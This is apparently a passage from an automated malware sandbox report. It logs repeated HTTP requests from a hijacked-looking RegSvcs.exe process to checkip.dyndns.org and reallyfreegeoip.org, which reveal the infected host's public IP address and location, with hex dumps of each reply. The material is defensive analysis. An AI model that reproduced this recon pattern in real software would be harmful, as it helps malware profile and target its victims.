                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:15.147749901 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: af0c5f3dd991eb488223ad67062cedc9
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.549715132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:15.555119038 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:16.216988087 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:16 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 437288fe35b7ccf4b5d4a6438ce6c1ef
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549717132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:16.866899014 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:17.531632900 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:17 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: f00e2bd8cde06d5cccfcc20ac501903f
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549719132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:18.329586029 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:19.021155119 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 874be775f0acf90a6ed419fd30d74441
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:19.077233076 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:19.287348032 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 92ae2324d24140ed3bb3bc4b16544611
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:19.563760996 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 92ae2324d24140ed3bb3bc4b16544611
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:20.224432945 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:20.434741020 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: d05bd782bc946fc911d6f068d71a7d6b
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549720132.226.247.73801488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:18.339478016 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:19.012907028 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 4490a1b6a914b2c04ddecb8cf2245d92
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.549728132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:21.965411901 CEST127OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Sep 19, 2024 12:21:23.019723892 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 6cc0e9f17936397c2c94c2a14525c198
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                          Sep 19, 2024 12:21:23.019907951 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 6cc0e9f17936397c2c94c2a14525c198
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.549732132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:23.673831940 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:24.361613989 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:24 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 8512ef4e2b844325b9327960a9196870
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.549734132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:24.999561071 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:25.693104982 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 2207541da7ebbb3ac80270b090988acb
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.549736132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:26.321783066 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:26.987364054 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:26 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 578ca719d472c6a9d24a76b4e21777a3
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.549738132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:27.641232014 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:28.314029932 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:28 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 03256956157702b8d679965657928e82
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.549740132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:28.947068930 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:29.621263027 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: b53042e37b0e7ccb301eeb0680ab38e2
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.549742132.226.247.73805688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 19, 2024 12:21:30.258122921 CEST151OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                          Host: checkip.dyndns.org
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2024 12:21:30.941971064 CEST320INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:30 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 103
                                                                          Connection: keep-alive
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          X-Request-ID: 9ed7c29f1163d8105f7da1acee2abb0a
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549705188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:08 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:09 UTC712INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:09 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15025
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWBU4%2BoKO%2B0Nr3N4jO6wdeGeJd4%2FBA3VuYdnBdWlVDhWkXgaQi63bQnY2AFIp9Jo3x60jRznxZN1kUjeaC%2B62TOBHSjC%2FPB7RBDpLECH7oOcILQyvopc%2BrlqkRWo5YQBoRym8102"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d8e34a204217-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549706188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-09-19 10:21:09 UTC714INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:09 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15025
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YKMdTRxbF0Vv36F2Gz%2Fdc9mE5hdF8cjoXnA3Eus21%2BaR2tduJQVL6u33BDQ4jrqQmuRScW%2F4qtaKbzh4%2F%2F6wNVTGp7RDTTSouSMmA4bm%2BljOEZi57DOh%2BrXnrc8XpcPYNY679Qa"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d8e85a5442ec-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-09-19 10:21:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                          2024-09-19 10:21:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549708188.114.97.34431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:11 UTC676INHTTP/1.1 200 OK
                                                                          Date: Thu, 19 Sep 2024 10:21:11 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 15027
                                                                          Last-Modified: Thu, 19 Sep 2024 06:10:44 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJgLt%2Fm6kFVWUhsi5CIFyCMOqsOZiCf5IhrUdwXxP5YBU6fkerbsGOa7dqSf06jlobcvB5LvjDX3o6Csw4dM5F045S5WM%2Bu0NN62OW7GR3BEYce%2B10kNl14Sny5Stytg7r4hbMOw"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8c58d8f0d8ea1a30-EWR
